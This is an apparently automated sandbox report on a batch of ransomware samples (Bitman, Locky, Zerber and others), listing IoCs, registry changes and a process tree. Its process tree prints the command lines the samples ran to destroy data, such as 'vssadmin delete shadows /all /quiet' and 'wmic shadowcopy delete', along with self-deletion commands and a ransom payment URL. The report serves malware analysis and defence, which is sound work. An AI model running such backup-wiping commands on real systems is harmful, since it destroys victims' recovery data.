Token: SeBackupPrivilege	1880	WMIC.exe
Token: SeRestorePrivilege	1880	WMIC.exe
Token: SeShutdownPrivilege	1880	WMIC.exe
Token: SeDebugPrivilege	1880	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1880	WMIC.exe
Token: SeRemoteShutdownPrivilege	1880	WMIC.exe
Token: SeUndockPrivilege	1880	WMIC.exe
Token: SeManageVolumePrivilege	1880	WMIC.exe
Token: 33	1880	WMIC.exe
Token: 34	1880	WMIC.exe
Token: 35	1880	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe
Token: SeSystemProfilePrivilege	2216	WMIC.exe
Token: SeSystemtimePrivilege	2216	WMIC.exe
Token: SeProfSingleProcessPrivilege	2216	WMIC.exe
Token: SeIncBasePriorityPrivilege	2216	WMIC.exe
Token: SeCreatePagefilePrivilege	2216	WMIC.exe
Token: SeBackupPrivilege	2216	WMIC.exe
Token: SeRestorePrivilege	2216	WMIC.exe
Token: SeShutdownPrivilege	2216	WMIC.exe
Token: SeDebugPrivilege	2216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2216	WMIC.exe
Token: SeRemoteShutdownPrivilege	2216	WMIC.exe
Token: SeUndockPrivilege	2216	WMIC.exe
Token: SeManageVolumePrivilege	2216	WMIC.exe
Token: 33	2216	WMIC.exe
Token: 34	2216	WMIC.exe
Token: 35	2216	WMIC.exe
Token: SeBackupPrivilege	2020	vssvc.exe
Token: SeRestorePrivilege	2020	vssvc.exe
Token: SeAuditPrivilege	2020	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1880	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2368	7zFM.exe
2368	7zFM.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1516	taskmgr.exe
1516	taskmgr.exe
1516	taskmgr.exe
1516	taskmgr.exe
1516	taskmgr.exe
1516	taskmgr.exe
1516	taskmgr.exe
1516	taskmgr.exe
1516	taskmgr.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2308	NOTEPAD.EXE
2976	iexplore.exe
2880	DllHost.exe
2880	DllHost.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2296	DllHost.exe
3412	iexplore.exe
2296	DllHost.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE
1128	Explorer.EXE

Suspicious use of SetWindowsHookEx 33 IoCs

pid	Process
1888	conhost.exe
2724	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
1612	kugvwgbsmmic.exe
1128	Explorer.EXE
1128	Explorer.EXE
2976	iexplore.exe
2976	iexplore.exe
1408	IEXPLORE.EXE
1408	IEXPLORE.EXE
3412	iexplore.exe
3412	iexplore.exe
228	IEXPLORE.EXE
228	IEXPLORE.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2576	iexplore.exe
2576	iexplore.exe
3080	IEXPLORE.EXE
3080	IEXPLORE.EXE
2292	iexplore.exe
2292	iexplore.exe
1520	IEXPLORE.EXE
1520	IEXPLORE.EXE
1976	iexplore.exe
1976	iexplore.exe
2572	IEXPLORE.EXE
2572	IEXPLORE.EXE
2636	IEXPLORE.EXE
2636	IEXPLORE.EXE
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
1836	Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1180 wrote to memory of 1868	1180	cmd.exe	35
PID 1180 wrote to memory of 1868	1180	cmd.exe	35
PID 1180 wrote to memory of 1868	1180	cmd.exe	35
PID 1180 wrote to memory of 860	1180	cmd.exe	36
PID 1180 wrote to memory of 860	1180	cmd.exe	36
PID 1180 wrote to memory of 860	1180	cmd.exe	36
PID 1180 wrote to memory of 884	1180	cmd.exe	37
PID 1180 wrote to memory of 884	1180	cmd.exe	37
PID 1180 wrote to memory of 884	1180	cmd.exe	37
PID 1180 wrote to memory of 1928	1180	cmd.exe	39
PID 1180 wrote to memory of 1928	1180	cmd.exe	39
PID 1180 wrote to memory of 1928	1180	cmd.exe	39
PID 1180 wrote to memory of 1652	1180	cmd.exe	41
PID 1180 wrote to memory of 1652	1180	cmd.exe	41
PID 1180 wrote to memory of 1652	1180	cmd.exe	41
PID 1180 wrote to memory of 1956	1180	cmd.exe	42
PID 1180 wrote to memory of 1956	1180	cmd.exe	42
PID 1180 wrote to memory of 1956	1180	cmd.exe	42
PID 1180 wrote to memory of 1668	1180	cmd.exe	43
PID 1180 wrote to memory of 1668	1180	cmd.exe	43
PID 1180 wrote to memory of 1668	1180	cmd.exe	43
PID 1180 wrote to memory of 1252	1180	cmd.exe	44
PID 1180 wrote to memory of 1252	1180	cmd.exe	44
PID 1180 wrote to memory of 1252	1180	cmd.exe	44
PID 1180 wrote to memory of 2288	1180	cmd.exe	45
PID 1180 wrote to memory of 2288	1180	cmd.exe	45
PID 1180 wrote to memory of 2288	1180	cmd.exe	45
PID 1180 wrote to memory of 1232	1180	cmd.exe	47
PID 1180 wrote to memory of 1232	1180	cmd.exe	47
PID 1180 wrote to memory of 1232	1180	cmd.exe	47
PID 1180 wrote to memory of 1336	1180	cmd.exe	48
PID 1180 wrote to memory of 1336	1180	cmd.exe	48
PID 1180 wrote to memory of 1336	1180	cmd.exe	48
PID 1180 wrote to memory of 2320	1180	cmd.exe	49
PID 1180 wrote to memory of 2320	1180	cmd.exe	49
PID 1180 wrote to memory of 2320	1180	cmd.exe	49
PID 1180 wrote to memory of 2344	1180	cmd.exe	51
PID 1180 wrote to memory of 2344	1180	cmd.exe	51
PID 1180 wrote to memory of 2344	1180	cmd.exe	51
PID 1180 wrote to memory of 1432	1180	cmd.exe	52
PID 1180 wrote to memory of 1432	1180	cmd.exe	52
PID 1180 wrote to memory of 1432	1180	cmd.exe	52
PID 1180 wrote to memory of 1248	1180	cmd.exe	53
PID 1180 wrote to memory of 1248	1180	cmd.exe	53
PID 1180 wrote to memory of 1248	1180	cmd.exe	53
PID 1180 wrote to memory of 1724	1180	cmd.exe	56
PID 1180 wrote to memory of 1724	1180	cmd.exe	56
PID 1180 wrote to memory of 1724	1180	cmd.exe	56
PID 1180 wrote to memory of 1844	1180	cmd.exe	58
PID 1180 wrote to memory of 1844	1180	cmd.exe	58
PID 1180 wrote to memory of 1844	1180	cmd.exe	58
PID 1180 wrote to memory of 1876	1180	cmd.exe	59
PID 1180 wrote to memory of 1876	1180	cmd.exe	59
PID 1180 wrote to memory of 1876	1180	cmd.exe	59
PID 1180 wrote to memory of 1680	1180	cmd.exe	61
PID 1180 wrote to memory of 1680	1180	cmd.exe	61
PID 1180 wrote to memory of 1680	1180	cmd.exe	61
PID 1180 wrote to memory of 1036	1180	cmd.exe	62
PID 1180 wrote to memory of 1036	1180	cmd.exe	62
PID 1180 wrote to memory of 1036	1180	cmd.exe	62
PID 1180 wrote to memory of 1196	1180	cmd.exe	63
PID 1180 wrote to memory of 1196	1180	cmd.exe	63
PID 1180 wrote to memory of 1196	1180	cmd.exe	63
PID 1180 wrote to memory of 1632	1180	cmd.exe	64

System policy modification 1 TTPs 10 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	ocenlufjyvdi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	ocenlufjyvdi.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	fjyvdiaajoqw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	kugvwgbsmmic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	hbtwdghtnrjw.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	hbtwdghtnrjw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	fjyvdiaajoqw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	kugvwgbsmmic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	khatelpdxqwo.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	khatelpdxqwo.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1044

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1068
- C:\Windows\System32\vssadmin.exe
  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Interacts with shadow copies
  PID:1276

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1128
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00298.7z"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1180
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1868
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:860
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:884
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1928
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1652
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1956
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1252
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2288
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1232
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1336
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2320
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1432
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1248
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1724
  - - C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
      "C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: MapViewOfSection
      PID:2428
    - - C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
        
        "C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe"
        5⤵
        Executes dropped EXE
        Sets desktop wallpaper using registry
        System Location Discovery: System Language Discovery
        
        PID:2704
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        6⤵
        
        PID:1700
        
        C:\Windows\system32\wbem\WMIC.exe
        
        C:\Windows\system32\wbem\wmic.exe shadowcopy delete
        7⤵
        
        PID:1600
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\README.hta"
        6⤵
        
        PID:1864
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://ftoxmpdipwobp4qy.gwz8gh.top/ABB7-22A5-6CE9-0091-BA55
        7⤵
        
        PID:3504
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3504 CREDAT:275457 /prefetch:2
        8⤵
        
        PID:1600
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe"
        6⤵
        
        PID:1120
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe"
        7⤵
        Kills process with taskkill
        
        PID:2564
        
        C:\Windows\system32\PING.EXE
        
        ping -n 1 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3548
  - - C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
      "C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Checks whether UAC is enabled
      System Location Discovery: System Language Discovery
      Modifies Control Panel
      Modifies Internet Explorer settings
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:2632
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\dn39Dr3g\serv.bat"
        5⤵
        
        PID:2524
  - - C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
      "C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      PID:2124
    - - C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
        
        "C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2844
      - C:\Users\Admin\AppData\Roaming\Gaxe\anli.exe
        
        "C:\Users\Admin\AppData\Roaming\Gaxe\anli.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:1096
        
        C:\Users\Admin\AppData\Roaming\Gaxe\anli.exe
        
        "C:\Users\Admin\AppData\Roaming\Gaxe\anli.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2948
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_a8b57e11.bat"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2496
  - - C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe
      "C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe"
      4⤵
      Executes dropped EXE
      Sets desktop wallpaper using registry
      System Location Discovery: System Language Discovery
      Modifies Control Panel
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:3016
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys4615.tmp"
        5⤵
        
        PID:3704
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1216
    - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
        
        "C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2760
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1732
    - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
        
        "C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe"
        5⤵
        Executes dropped EXE
        
        PID:2260
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of SetWindowsHookEx
      PID:2724
    - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
        
        "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1004
      - C:\Windows\kugvwgbsmmic.exe
        
        C:\Windows\kugvwgbsmmic.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1612
        
        C:\Windows\kugvwgbsmmic.exe
        
        C:\Windows\kugvwgbsmmic.exe
        7⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        System policy modification
        
        PID:3348
        
        C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        8⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
        8⤵
        System Location Discovery: System Language Discovery
        Opens file in notepad (likely ransom note)
        
        PID:1460
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
        8⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2576
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2576 CREDAT:275457 /prefetch:2
        9⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:3080
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\KUGVWG~1.EXE
        8⤵
        
        PID:2808
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00298\TROJAN~3.EXE
        6⤵
        
        PID:1636
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of AdjustPrivilegeToken
      PID:920
    - - C:\Windows\hbtwdghtnrjw.exe
        
        C:\Windows\hbtwdghtnrjw.exe
        5⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2516
      - C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        6⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
      - C:\Windows\SysWOW64\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
        6⤵
        System Location Discovery: System Language Discovery
        Opens file in notepad (likely ransom note)
        
        PID:3236
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:3412
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3412 CREDAT:275457 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:228
      - C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        6⤵
        
        PID:2416
      - C:\Windows\SysWOW64\cmd.exe
